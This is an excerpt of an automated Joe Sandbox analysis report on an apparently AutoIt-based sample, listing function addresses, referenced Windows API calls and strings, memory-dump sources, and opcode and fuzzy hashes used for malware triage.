Instruction Fuzzy Hash: 6FC27E72E046288FDB65CF68ED807E9B7B5EB49304F1445EAD44DE7280EB75AE818F40

Uniqueness

Uniqueness Score: -1.00%

Function 029DB340 Relevance: 2.4, Strings: 1, Instructions: 1168COMMON

Download Yara Rule

Strings

p#M, xrefs: 02A1FBCE

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID:
String ID: p#M
API String ID: 0-494205710
Opcode ID: fe71273373c28b08c65656d46e4b6e52bc27789db3095068bcab06779e61c9ad
Instruction ID: 124e8f5432c62efe5491932f1ed7ff10e3f564ce101e429e2cc1b5721e744a3a
Opcode Fuzzy Hash: fe71273373c28b08c65656d46e4b6e52bc27789db3095068bcab06779e61c9ad
Instruction Fuzzy Hash: 35A27B746083419FC720CF28C490B2ABBF5BF89318F15896DE99A9B751DB31E845CF92

Uniqueness

Uniqueness Score: -1.00%

Function 029DBEF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON

Download Yara Rule

Strings

p#M, xrefs: 029DC37F

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID:
String ID: p#M
API String ID: 0-494205710
Opcode ID: 97830a7c32e45fbbb93f874df01f1415d23e2765525af164336203b38f322224
Instruction ID: e28e26361bd0862c11193010ec479613475f38e72fab3e0c634a7c331f67a0f2
Opcode Fuzzy Hash: 97830a7c32e45fbbb93f874df01f1415d23e2765525af164336203b38f322224
Instruction Fuzzy Hash: 6232AC30900228DFDF14DF94C980BEDB7BABF55308F54C05AE806AB291DB75AA49DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00B1CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 00B60C40

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.
API String ID: 0-1840281001
Opcode ID: 3f60f40d3a03cb24d1664b7bb41933e75c9a6b273b7c4474f4672937928660c9
Instruction ID: 5ead033843ffed49d484b4f86593f870ba84e44f4f1fe44731304bec3de4bcc6
Opcode Fuzzy Hash: 3f60f40d3a03cb24d1664b7bb41933e75c9a6b273b7c4474f4672937928660c9
Instruction Fuzzy Hash: 0D327070950218DBCF14EF94D881AEEBBF5FF05304F9480E9E806AB291D775AD8ACB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B4676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00B46766,?,?,00000008,?,?,00B4FEFE,00000000), ref: 00B46998

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 7e63b2042957eedaa53206aafa2e46a26ee42412a427b9a2e3bc7dee67c80bdd
Instruction ID: 934964278710705353d16d8575437e955b2ffa3d7ccff06fe8ad694ab09b8828
Opcode Fuzzy Hash: 7e63b2042957eedaa53206aafa2e46a26ee42412a427b9a2e3bc7dee67c80bdd
Instruction Fuzzy Hash: F7B14C31610608DFD719CF28C48AB657BE0FF46364F258699E899CF2A2C335EE91DB41

Uniqueness

Uniqueness Score: -1.00%

Function 00B8EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32 ref: 00B8EABD

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 32c583e3c7fe6e664ea2f6cce7999ec2b4bf541a6b49bddbd503cfc7c933ab58
Instruction ID: 81345e7a5365be50df92a1021e02db95d1b2ef1ca66f7cc4986f672fdf8ce947
Opcode Fuzzy Hash: 32c583e3c7fe6e664ea2f6cce7999ec2b4bf541a6b49bddbd503cfc7c933ab58
Instruction Fuzzy Hash: 41E04F312102049FC710EF59D845E9AFBE9EF98760F00845AFC49C7361DB70E881CB90

Uniqueness

Uniqueness Score: -1.00%

Function 029F6C1B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 029F6D8B

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: cc6317bc90d8b2bb5a5e2f697c8bcfbde772c35e873a9d4de18db91b5caa4109
Instruction ID: 8b5f07268d1abce8cd790118749105effdb953389ccec056aa83f98fa4749480
Opcode Fuzzy Hash: cc6317bc90d8b2bb5a5e2f697c8bcfbde772c35e873a9d4de18db91b5caa4109
Instruction Fuzzy Hash: BE51666260074557DBF449798D947FE67EEDF42308F080909CBF6CB281C716EA05CB66

Uniqueness

Uniqueness Score: -1.00%

Function 02A41446 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

0&M, xrefs: 02A41453

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID:
String ID: 0&M
API String ID: 0-278495883
Opcode ID: c32e3fc8385f568c32938d2280db9929dc4b1fa9f2a4dd4730763afb1ea23267
Instruction ID: 69a95dc7c7f2334a53846bd50254d984b45b0eb5b3cc61e84870592e6ebd5429
Opcode Fuzzy Hash: c32e3fc8385f568c32938d2280db9929dc4b1fa9f2a4dd4730763afb1ea23267
Instruction Fuzzy Hash: A621D8723216118BD718CF79C92277E73E5A794310F548A2EE4A7C33C0DE79E9448B44

Uniqueness

Uniqueness Score: -1.00%

Function 029EA3AC Relevance: .9, Instructions: 881COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bda1bef9456331f75c71545df57f8250ad6df8efdbdb96c881304aaddbd26f52
Instruction ID: 004812b7e7c369d81e5cef2317abde2242f00f92db34cc0fb460e747ae90c639
Opcode Fuzzy Hash: bda1bef9456331f75c71545df57f8250ad6df8efdbdb96c881304aaddbd26f52
Instruction Fuzzy Hash: 4D725075E00229DBDF25CF59C8907AEB7B5FF44314F1481AAD809EB290EB749A85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02A061D9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17ddb9ff0a2cf66dafba2a4f174e9dfcd52e6dbbcf633c554e47d961472dc0aa
Instruction ID: ce4fc3154595a781b4487687d60ea1e3f95350d95942109946dab49813020d12
Opcode Fuzzy Hash: 17ddb9ff0a2cf66dafba2a4f174e9dfcd52e6dbbcf633c554e47d961472dc0aa
Instruction Fuzzy Hash: B4323222D29F014DD7239638D9A1336A68DAFA77C8F14D737E81AB5DA6EF28C0D35104

Uniqueness

Uniqueness Score: -1.00%

Function 00B46DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ff5f349d53e070dc071dc6e2eb1d6970500c3846a650fcae8815514f6aaee21
Instruction ID: 74983d57afbfc13c18b192d592468b40f2edd42eefdf389e9aab6407b7e7532e
Opcode Fuzzy Hash: 6ff5f349d53e070dc071dc6e2eb1d6970500c3846a650fcae8815514f6aaee21
Instruction Fuzzy Hash: 9A324521D69F014EDB239635CC22335A689EFB73C5F15C737E81AB6AA5EF68C5839100

Uniqueness

Uniqueness Score: -1.00%

Function 00B2CC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8318c9611c82784f7f620fe9a75abc77dc81b00f53afedf55bd0200a3dab8da
Instruction ID: 65497ceacaff5269eec6a21d5f6feb29dbcd70af27cda92e5a73be1cabc3a619
Opcode Fuzzy Hash: c8318c9611c82784f7f620fe9a75abc77dc81b00f53afedf55bd0200a3dab8da
Instruction Fuzzy Hash: 6432F331A001598BCF28CE68D4D467D7FE1EB45300F2885EAD4DEDB296E638DE81DB81

Uniqueness

Uniqueness Score: -1.00%

Function 029D6D20 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76e02dd3e382dd74b1354a9ce9f9622f16ddc629c650c56ba59a3a027342d3fc
Instruction ID: b255a07001b261a90dc9367c1238984824208a8ee5647a03bda894a9d8459a42
Opcode Fuzzy Hash: 76e02dd3e382dd74b1354a9ce9f9622f16ddc629c650c56ba59a3a027342d3fc
Instruction Fuzzy Hash: D622B471A00609DFDF14CFA8D980AAEB7FAFF48314F148529D816A7290EB36E915DB50

Uniqueness

Uniqueness Score: -1.00%

Function 029D85C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25956fc5bfea20bdd036dcb75c4f1a271b1f179591a399dc50be3bb9f383f354
Instruction ID: dbeda51c1fbc19dfc6779c33b7991536182f4edb95d9e79c463f9dcfbd0dc27d
Opcode Fuzzy Hash: 25956fc5bfea20bdd036dcb75c4f1a271b1f179591a399dc50be3bb9f383f354
Instruction Fuzzy Hash: 7D02C5B1E00609EFDF05DF64D980BAEB7B6FF44314F508169E8169B290EB31AA15CF94

Uniqueness

Uniqueness Score: -1.00%

Function 02A5B244 Relevance: .5, Instructions: 456COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 8a102234217cb8fc5e12fb5b6e35db5449b99f49e6866c8df089dfd82f192649
Instruction ID: 305b8b6174d78dc177d3efe9c35c877df441707c5a8d5773efb2a8118ec4a0b5
Opcode Fuzzy Hash: 8a102234217cb8fc5e12fb5b6e35db5449b99f49e6866c8df089dfd82f192649
Instruction Fuzzy Hash: A8023C71604210DFD714DF28C4D4E2ABBE5EF88318F18889DE84ACB2A6DB31ED45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 029E8D7D Relevance: .4, Instructions: 375COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 008d7f4966374fd70fc10806bddab33b900210bcee92a512a1071b2935ce9feb
Instruction ID: 8ec2bad96e153d2c18562b8be7a83f80d5ee39a5977abc4b3d730f1d5ef11161
Opcode Fuzzy Hash: 008d7f4966374fd70fc10806bddab33b900210bcee92a512a1071b2935ce9feb
Instruction Fuzzy Hash: ADA10770242124BEEE27BBBC8D98E7B265EFB42714B04491AF503D61B0CF259949C676

Uniqueness

Uniqueness Score: -1.00%

Function 02A092EE Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7a3ac8471f91f87413cf2040edfb0e0a623f0fab5818d86c8d40d2451d7a50e
Instruction ID: 9520556ea2ee99dc3e2db47dc909f8d7ef19841dc9dd4d15d74daeb3ca75fb23
Opcode Fuzzy Hash: d7a3ac8471f91f87413cf2040edfb0e0a623f0fab5818d86c8d40d2451d7a50e
Instruction Fuzzy Hash: CBB1F420D2AF414DD6239A398871336FA5C6FBB6D6F91D72BFC1674D62FB2285834240

Uniqueness

Uniqueness Score: -1.00%

Function 02A05B6B Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 198a520ea869a35980b3f78eccd319767a6126f68f47798b27a54d549f42ff15
Instruction ID: aeebc4acb0360d3be6002eaea23e4eafbe8cb3936db8fe1591284522e92c45d1
Opcode Fuzzy Hash: 198a520ea869a35980b3f78eccd319767a6126f68f47798b27a54d549f42ff15
Instruction Fuzzy Hash: F6B127319106088FD715CF28D4CAB657BE0FB05368F658659E899CF2E1CB35E991CF40

Uniqueness

Uniqueness Score: -1.00%

Function 029F1077 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 8258521909d63cbbeadcc3f37fd6ac4f04439e78871d0caa496f4740457f1702
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: C29182322080E38AEBED427A857417EFFE95E821B570A079ED5F6CA1C5EF10D164DB60

Uniqueness

Uniqueness Score: -1.00%

Function 029F1332 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 8f8b5deae01846aca9404681a4f41bcb7750a2407e9145ecd29b5d0c7f50230f
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 9F9184732080A38ADBED423A857413EFFE95A821B530A079ED5FACB1C5EF24D164D760

Uniqueness

Uniqueness Score: -1.00%

Function 029F0DB0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: ae8f3d7d179c724ba92a9e0d8e9191ea33b26186852a53274cf0eb6371ac215e
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: E89173722191A34EDBED423A857413EFFED5A421A530A07AED5F2CA1CAFF14D164D720

Uniqueness

Uniqueness Score: -1.00%

Function 029F6E4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e3d0bc900cf1b892d14c28e0ffe1d7d887a8a211ac8b23e48eb025ee859e12e
Instruction ID: cf1d50f1682cbf562a2a482d272999eed1c689a14be31d3a70eeee6269a1fe3f
Opcode Fuzzy Hash: 2e3d0bc900cf1b892d14c28e0ffe1d7d887a8a211ac8b23e48eb025ee859e12e
Instruction Fuzzy Hash: 0C618972200705A6DFF49A68C854BFEA3ADDF81708F05092EEB63CB280E711E946C755

Uniqueness

Uniqueness Score: -1.00%

Function 029F70A7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62de30cbe308c2b2cb8d72c6a4f5f113deb5d1fc96455593ad16d38271f3c341
Instruction ID: ac55677b03369cabe341b8ca6dafce9767db5e9318eefe1f3caa8c2fecd89769
Opcode Fuzzy Hash: 62de30cbe308c2b2cb8d72c6a4f5f113deb5d1fc96455593ad16d38271f3c341
Instruction Fuzzy Hash: EA61473170070966DEF859E89C94BFEE39EAB41308F140D1AEB42DF288D751E94AC755

Uniqueness

Uniqueness Score: -1.00%

Function 029F0B06 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 1bfe75114873cd747ddd28e8cbfb9648e54a96dbf6145125eaa126c4afaf49b6
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: CE8162732091A349DBE9463A857413EFFED6E422A630A079DD5F2CA1CBFF249158D720

Uniqueness

Uniqueness Score: -1.00%

Function 00B82046 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85744c366e71fd3b64767d752a9e6a279bca2783efa5c6de61b6923aab094b7a
Instruction ID: 48d4d8aef9c7252ee8c04a9329af1c20f68d0204bd54d73e95c4f7e55ba568d9
Opcode Fuzzy Hash: 85744c366e71fd3b64767d752a9e6a279bca2783efa5c6de61b6923aab094b7a
Instruction Fuzzy Hash: 4321E7326206118BDB28CF79C82367E73E9E794310F14866EE4A7C73D0DE75A904CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00B92ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00B92B30
DeleteObject.GDI32(00000000), ref: 00B92B43
DestroyWindow.USER32 ref: 00B92B52
GetDesktopWindow.USER32 ref: 00B92B6D
GetWindowRect.USER32(00000000), ref: 00B92B74
SetRect.USER32 ref: 00B92CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00B92CB1
CreateWindowExW.USER32 ref: 00B92CF8
GetClientRect.USER32 ref: 00B92D04
CreateWindowExW.USER32 ref: 00B92D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00B92D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B92D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B92D80
GlobalLock.KERNEL32 ref: 00B92D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00B92D98
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B92DA1
CloseHandle.KERNEL32(00000000), ref: 00B92DA8
GlobalFree.KERNEL32(00000000), ref: 00B92DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00B92DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,00BAFC38,00000000), ref: 00B92DDB
GlobalFree.KERNEL32(00000000), ref: 00B92DEB
CopyImage.USER32 ref: 00B92E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00B92E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00B92E52
ShowWindow.USER32(00000004), ref: 00B9303F

Strings

static, xrefs: 00B92D3A, 00B92E91
, xrefs: 00B92FC5
DISPLAY, xrefs: 00B92EA2
AutoIt v3, xrefs: 00B92CF2

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

